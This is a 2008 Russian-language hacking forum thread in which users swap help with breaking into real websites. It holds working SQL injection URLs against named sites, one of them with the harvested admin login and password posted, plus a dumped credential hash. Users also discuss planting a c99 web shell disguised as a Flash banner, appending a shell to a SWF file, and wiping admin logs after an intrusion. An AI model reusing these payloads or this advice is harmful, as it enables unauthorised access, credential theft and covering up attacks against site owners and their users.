HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.11.2008, 17:53
peonix
Познающий
Регистрация: 09.11.2008
Сообщений: 34
Провел на форуме:
36308

Репутация: 2
По умолчанию

Цитата:
Сообщение от criz  
узнай че висит на сервере
Я новичек поэтому жаргон еще не совсем знаю...
Сори за тупой вопрос... А висит на сервере это типа какие демоны запущены или что? и искать эксплойт под ядро операционки или под какую то другую лажу?
 
Ответить с цитированием

  #2  
Старый 19.11.2008, 18:05
peonix
Познающий
Регистрация: 09.11.2008
Сообщений: 34
Провел на форуме:
36308

Репутация: 2
По умолчанию

Цитата:
Сообщение от criz  
стандарт: узнай че висит на сервере, потом идешь, например, на милворм и ищешь "инструмент"(эксплойт) и можешь действовать
смотри вот этот эксплоит под мой вариант прокатит?
http://milw0rm.com/exploits/6304
 
Ответить с цитированием

  #3  
Старый 18.11.2008, 23:42
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию

http://www.site//out.asp?id=1+or+1=(SELECT+TOP+1+cast(username+as+n varchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+ from+x_ads_account)--
Цитата:
Tipo di errore:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Sintassi non corretta in prossimità della parola chiave 'or'.
/appl/out.asp, linea 133
почему пишет, что неверное слово or, когда ДО этого, я спокойно его использовал при выводе таблиц? можно ли его заменить как-то?



Ann:1756543d9b768d870fab2000d9b667f8:new!pass#

Последний раз редактировалось Ershik; 18.11.2008 в 23:54..
 
Ответить с цитированием

swf - баннеры
  #4  
Старый 19.11.2008, 18:40
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Exclamation swf - баннеры

Вопрос такой:
могу заливать и вешать баннеры на одном хосте.
проверки антивирем содержимого баннера нету, фильтрация по расширению не стоит (вроде как).
Директорию, куда пишутся файлы не получилось определить, и походу там есть несколько моих вебшеллов :-/

возможно ли записать в тело баннера код, который бы автоматичевки выполнялся при загрузке баннера?
что можно выжать максимально из возможности заливки и вывешивания баннеров (что-то вроде iframe, автоматической переадресации на "нужный сайт", запихнуть в него сплоит. или что нибудь в таком духе)

В вопросе по устройству и возможностях swf-файлов ничего не знаю, вот и задаю вопрос (-
 
Ответить с цитированием

  #5  
Старый 19.11.2008, 18:42
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

Определи директорию банально. Просто "копировать адрес рисунка", после имя твоего файла допишешь и всё.
 
Ответить с цитированием

  #6  
Старый 19.11.2008, 19:07
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
По умолчанию

Цитата:
Сообщение от ThreeD  
Определи директорию банально. Просто "копировать адрес рисунка", после имя твоего файла допишешь и всё.
баннер это не картинка, a "Shockvawe Flash Object" :-\ анимашка.

Код:
data="http://_______/banners/c99madshell.php.SWF"
.........
<param name="movie" value="banners/c99madshell.php.SWF">
захожу в дерикторию /banners/ и она пустая, файлов нет Х___х
нужны действующие способы (- репой закидаю (-
 
Ответить с цитированием

  #7  
Старый 19.11.2008, 19:54
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

Если баннер заливается (и не в БД) и с любым расширением - то можешь просто в конец флешки записать шелл в хекс-редакторе. Если расширение полюбому SWF, то те нужно именно флешку заливать с определённым кодом (ЭкшенСкрипт) редиректа - это максимум
 
Ответить с цитированием

  #8  
Старый 19.11.2008, 20:09
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
По умолчанию

Цитата:
смотри вот этот эксплоит под мой вариант прокатит?
http://milw0rm.com/exploits/6304
не прокатит, потому что это не эксплоит, а шеллкод
 
Ответить с цитированием

  #9  
Старый 19.11.2008, 20:29
peonix
Познающий
Регистрация: 09.11.2008
Сообщений: 34
Провел на форуме:
36308

Репутация: 2
По умолчанию

http://www.a-shop.ru/product_info.php?products_id=-1'+union+select+concat(username,char(58),password) +from+administrators/*

http://www.a-shop.ru/admin
sergey : q1w2e3
там есть менюшка с логами , вот как их отчистить?
 
Ответить с цитированием

  #10  
Старый 19.11.2008, 23:39
_nic
Постоянный
Регистрация: 05.05.2006
Сообщений: 743
Провел на форуме:
2982851

Репутация: 107


По умолчанию

Как можно безпалевно проверить днс сервер на эту http://www.securitylab.ru/vulnerability/355730.php дыру?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.